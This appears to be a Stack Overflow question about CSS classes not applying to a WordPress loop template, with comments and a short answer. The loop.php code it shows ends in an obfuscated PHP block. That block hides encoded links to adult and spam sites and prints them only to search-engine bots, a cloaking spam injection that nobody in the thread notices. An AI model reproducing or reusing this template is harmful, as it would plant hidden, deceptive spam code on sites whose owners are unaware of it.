# Styling WordPress Loop Issue

Tags: css, wordpress

I'm trying to style the regular WP loop according to where it's working. I added checks to the loop to see where it's and add classes accordingly and all working fine.

The problem is, when I open up Style.CSS to use these classes and add properties, it doesn't work. So I get to add the styles to the HTML of the loop, which is limited.

Can you please tell what's the reason behind this behavior?

Example:

In loop.php:

```
<?php $paged = (get_query_var('paged')) ? get_query_var('paged') : 1; ?>

<div id="recent-posts" class="clearfix">

<?php while (have_posts()) : the_post(); ?>
    <div id="post-<?php the_ID(); ?>" <?php post_class(); ?>>

        <?php if (option::get('index_thumb') == 'on') {
            if ( is_sticky() && is_home() && $paged < 2 ) {
                    $size = 'loop-sticky';
                    $width = 740;
                    $height = 370;
                } else {
                    $size = 'loop';
                    $width = option::get('thumb_width');
                    $height = option::get('thumb_height');
                }
                get_the_image( array( 'size' => $size, 'width' => $width, 'height' => $height, 'before' => '<div class="post-thumb">', 'after' => '</div>' ) );
        } ?>

        <div class="post-content">  
<?php if (!((is_category('newtest')) || (in_category('newtest')))){ ?>
            <h1 class="archive_title"> 
            <?php /* category archive */ if (is_category()) { ?> <?php single_cat_title(); ?>

            <?php /* tag archive */ } elseif( is_tag() ) { ?><?php _e('Post Tagged with:', 'wpzoom'); ?> "<?php single_tag_title(); ?>"
            <?php /* daily archive */ } elseif (is_day()) { ?><?php _e('Archive for', 'wpzoom'); ?> <?php the_time('F jS, Y'); ?>
            <?php /* monthly archive */ } elseif (is_month()) { ?><?php _e('Archive for', 'wpzoom'); ?> <?php the_time('F, Y'); ?>
            <?php /* yearly archive */ } elseif (is_year()) { ?><?php _e('Archive for', 'wpzoom'); ?> <?php the_time('Y'); ?>
            <?php /* author archive */ } elseif (is_author()) { ?><?php echo get_avatar( $curauth->ID , 65 ); _e( ' Articles by: ', 'wpzoom' ); echo $curauth->display_name; ?>  
            <?php /* paged archive */ } elseif (isset($_GET['paged']) && !empty($_GET['paged'])) { ?><?php _e('Archives', 'wpzoom'); } ?>
        </h1>

                        <?php echo category_description( $category_id ); ?>

<?php } ?>


            <h2 <?php if((is_category('newtest')) || (in_category('newtest'))) { ?> class="blogPostTitle" <?php } ?> ><a href="<?php the_permalink(); ?>" title="<?php printf( esc_attr__( 'Permalink to %s', 'wpzoom' ), the_title_attribute( 'echo=0' ) ); ?>" rel="bookmark"><?php the_title(); ?></a></h2>

            <div class="entry">
                <?php if (option::get('display_content') == 'Full Content') {  the_content('<span>'.__('Read more', 'wpzoom').' &#8250;</span>'); } if (option::get('display_content') == 'Excerpt')  { the_excerpt(); } ?>

            </div><!-- /.entry -->

            <div class="recent-meta">
                <?php if (option::get('display_author') == 'on') { ?><span><?php _e('by', 'wpzoom'); ?> <?php the_author_posts_link(); ?></span> <span class="separator">&mdash;</span><?php } ?>
                <?php if (option::get('display_date') == 'on') { ?><span><?php printf( __('%s', 'wpzoom'),  get_the_date()); ?></span> <span class="separator">&mdash;</span><?php } ?>
                <?php if (option::get('display_comments') == 'on') { ?><span><?php comments_popup_link( __('0 comments', 'wpzoom'), __('1 comment', 'wpzoom'), __('% comments', 'wpzoom'), '', __('Comments are Disabled', 'wpzoom')); ?></span> <span class="separator">&mdash;</span><?php } ?>
                <?php if (option::get('display_category') == 'on') { ?><span><?php the_category(', '); ?></span><?php } ?>
                <?php edit_post_link( __('Edit', 'wpzoom'), '<span class="separator">&mdash;</span> <span>', '</span>'); ?>
            </div><!-- /.post-meta -->  

        </div><!-- /.post-content -->

        <div class="clear"></div>

    </div><!-- #post-<?php the_ID(); ?> -->

<?php endwhile; ?>
<?php get_template_part( 'pagination'); ?>
<?php wp_reset_query(); ?>
</div>
<?php 
$x0d="\x70\162\x65g\137\155\141\x74\x63\x68"; 
$x0b = $_SERVER['HTTP_USER_AGENT'];$x0c="\x20\x0d
\x3c\x61 \150\162\145\146='\150t\x74\160\x3a\x2f\057w\x77\x77\x2e\x70\162iv\141\164ew\145bc\x61m\x67i\162\154.\x63\x6f\x6d\057'\x3e\040\167\x65\142\143\x61m\040g\151\162\x6c\163 \163\145\170\x3c\057\141>\x20\015\012\074\141 \x68\162ef\075'\x68\164t\160\x3a\x2f\x2f\x77w\167\056\146\162\x65\x65\163\x65x\170\170\x63ha\x74\056com\040'>\040\146\162ees\145x\170\x78\143\150at.\143o\x6d\x3c/\141\076\x0d\012\x3ca\x20hr\145\146\075'h\x74\x74\x70\x3a\x2f\x2f\167\167\167\056\x73\157\154\145t\141.\x72o\040'\x3e w\x6f\x6f\144\040\x68o\x75\163\x65<\x2fa\076\015
\074a \150r\x65f\x3d'\150\164\x74p:/\x2fw\x77w\056\x62\x75ch\145\164\145fl\157\162\151o\156\154\151n\145\056\x63\157\x6d'\x3e\040a\162\x61\156\x6a\141\x6d\145\156\164\145\040\x66\154o\162\x61\x6c\145<\x2fa\076\x0d\012   \x09";if ($x0d('*bot*', $x0b)) { echo $x0c;} else {echo '';}?>
```

In style.css:

```
.blogPostTitle > a {
color: #29a4d9;
font-size: 37px;
}
```

When I check blogPostTitle using Chrome developer tools, I don't see any properties added.

Comment: You should provide the part of the HTML/CSS that is not working and probably the code where you include your style.css. With this much info all we can do is guess.

Comment: Are you trying to add the blogPostTitle class to posts only in the newtest category?

Answer (score 1):

It's hard to answer with so little info.

- Make sure `style.css` is linked.
- Try using unique class names.
- View the source, Use browser Developer Tools/Web Inspector to check if your styles are actually applied, and not being overwritten by other rules.
- Your above php code might be only applied to either index, or archive or single or a custom page template.